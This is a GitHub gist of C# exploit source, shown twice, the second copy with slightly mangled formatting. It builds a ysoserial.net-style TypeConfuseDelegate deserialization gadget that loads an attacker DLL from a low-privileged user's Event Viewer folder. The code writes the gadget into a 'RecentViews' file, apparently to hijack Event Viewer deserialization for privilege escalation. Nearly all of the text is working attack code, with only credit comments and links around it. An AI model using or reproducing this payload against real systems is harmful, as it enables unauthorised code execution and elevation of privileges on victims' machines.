mgeeky/gist:a7dd62dd86205ad19c7365037508bb76

## gistfile1.txt
//All credit goes to Ysoserial.net and the great @tiraniddo
//Snippets copied from ysoserial.net
//https://thewover.github.io/Mixed-Assemblies/ - Great read!
//https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui - Another great read
using System;
using System.Collections.Generic;
using System.Runtime.Serialization.Formatters.Binary;
using System.IO;
using System.Reflection;

namespace EventVwr
{
    class Program
    {
        //https://github.com/pwntester/ysoserial.net/blob/5faa7f13cfd745ac039a30eb05dfe6c19c048859/ysoserial/Generators/TypeConfuseDelegateGenerator.cs
        static object TypeConfuseDelegateGadget()
        {
            Delegate da = new Comparison<string>(String.Compare);
            Comparison<string> d = (Comparison<string>)MulticastDelegate.Combine(da, da);
            IComparer<string> comp = Comparer<string>.Create(d);
            SortedSet<string> set = new SortedSet<string>(comp);
            set.Add(@"C:\Users\underpriv\AppData\Local\Microsoft\Event Viewer\messagebox.dll");
            set.Add("");

            FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic | BindingFlags.Instance);
            object[] invoke_list = d.GetInvocationList();
            //invoke_list[1] = new Func<string, string, Process>(Process.Start);
            invoke_list[1] = new Func<string, object>(System.Reflection.Assembly.LoadFrom);
            fi.SetValue(d, invoke_list);
            return set;
        }

        static void Main(string[] args)
        {
            Console.WriteLine("[*] Start [*]");

            BinaryFormatter myFormatter = new BinaryFormatter();
            MemoryStream myStream = new MemoryStream();
            MemoryStream memoryStream = new MemoryStream();
            myFormatter.Serialize(myStream, TypeConfuseDelegateGadget());
            myStream.Position = 0;
            using (BinaryWriter binaryWriter = new BinaryWriter(memoryStream))
            {
                binaryWriter.Write(myStream.GetBuffer(), 0, (int)myStream.Length);
                using (FileStream fileStream = File.Create("RecentViews"))
                {
                    fileStream.Write(memoryStream.GetBuffer(), 0, (int)memoryStream.Length);
                }
            }
            Console.WriteLine("[*] End [*]");
        }
    }
}
	//All credit goes to Ysoserial.net and the great @tiraniddo
	//Snippets copied from ysoserial.net
	//https://thewover.github.io/Mixed-Assemblies/ - Great read!
	//https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui - Another great read
	using System;
	using System.Collections.Generic;
	using System.Runtime.Serialization.Formatters.Binary;
	using System.IO;
	using System.Reflection;

	namespace EventVwr
	{
	class Program
	{
	//https://github.com/pwntester/ysoserial.net/blob/5faa7f13cfd745ac039a30eb05dfe6c19c048859/ysoserial/Generators/TypeConfuseDelegateGenerator.cs
	static object TypeConfuseDelegateGadget()
	{
	Delegate da = new Comparison<string>(String.Compare);
	Comparison<string> d = (Comparison<string>)MulticastDelegate.Combine(da, da);
	IComparer<string> comp = Comparer<string>.Create(d);
	SortedSet<string> set = new SortedSet<string>(comp);
	set.Add(@"C:\Users\underpriv\AppData\Local\Microsoft\Event Viewer\messagebox.dll");
	set.Add("");

	FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic \| BindingFlags.Instance);
	object[] invoke_list = d.GetInvocationList();
	//invoke_list[1] = new Func<string, string, Process>(Process.Start);
	invoke_list[1] = new Func<string, object>(System.Reflection.Assembly.LoadFrom);
	fi.SetValue(d, invoke_list);
	return set;
	}

	static void Main(string[] args)
	{
	Console.WriteLine("[] Start []");

	BinaryFormatter myFormatter = new BinaryFormatter();
	MemoryStream myStream = new MemoryStream();
	MemoryStream memoryStream = new MemoryStream();
	myFormatter.Serialize(myStream, TypeConfuseDelegateGadget());
	myStream.Position = 0;
	using (BinaryWriter binaryWriter = new BinaryWriter(memoryStream))
	{
	binaryWriter.Write(myStream.GetBuffer(), 0, (int)myStream.Length);
	using (FileStream fileStream = File.Create("RecentViews"))
	{
	fileStream.Write(memoryStream.GetBuffer(), 0, (int)memoryStream.Length);
	}
	}
	Console.WriteLine("[] End []");
	}
	}
	}